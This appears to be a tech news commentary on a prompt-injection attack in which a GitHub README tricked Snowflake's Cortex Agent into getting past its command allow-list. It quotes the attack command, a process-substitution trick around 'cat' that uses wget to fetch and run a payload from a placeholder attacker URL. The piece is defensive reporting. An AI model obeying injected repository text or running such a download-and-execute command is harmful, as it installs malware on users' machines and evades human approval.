Snowflake Cortex AI’s sandbox escape exposes prompt flaws

Snowflake Cortex AI’s sandbox escape exposes prompt flaws📷 Published: Apr 18, 2026 at 10:22 UTC
- ★Cortex Agent bypassed via GitHub README injection
- ★Malicious shell command exploited allow-listed cat
- ★Trust in command allow-lists proves dangerously naive
Snowflake’s Cortex Agent just proved that no AI assistant is safer than its weakest command execution layer. A prompt injection hidden in a GitHub README—buried in plain sight below useful docs—tricked the agent into running a shell command that fetched and executed malware via wget. The exploit bypassed built-in filters by abusing process substitution: cat <<(sh <<(wget -q0- [ATTACKER_URL]/bugbot)), a trick that slipped past Cortex’s allow-listed cat command rule without human approval.
Early signals suggest the payload, dubbed “bugbot,” was likely a remote shell or reconnaissance tool deployed by the attacker. Issues like this are inevitable when security relies on blacklisting or allow-listing specific commands rather than enforcing zero-trust execution. Simon Willison’s findings confirm what many in AI security have long warned: treating commands as safe simply because they’re common is an invitation to abuse.

Command allow-lists are security theater, not protection📷 Published: Apr 18, 2026 at 10:22 UTC
Command allow-lists are security theater, not protection
The fix arrived quickly, but the lessons are slower to sink in. PromptArmor reported the flaw to Snowflake, which patched the gap, yet trust in command allow-lists remains a dangerous pattern across many AI agent platforms. If Cortex’s cat looked harmless, what else is quietly executable? The community’s response skews toward skepticism of patch-and-move cycles, pushing for stricter sandboxing and runtime verification instead.
The real signal here is that AI agents aren’t just LLM endpoints—they’re attack surfaces. Every tool call, every command accepted at face value is a potential gateway for malware. Developers should treat all user-provided code, even “harmless” snippets, as hostile until proven otherwise.
For teams shipping agents, the takeaway is simple: stop trusting user prompts to police themselves. Implement mandatory approval for any shell command, runtime monitoring, and assume every repository link is a Trojan horse.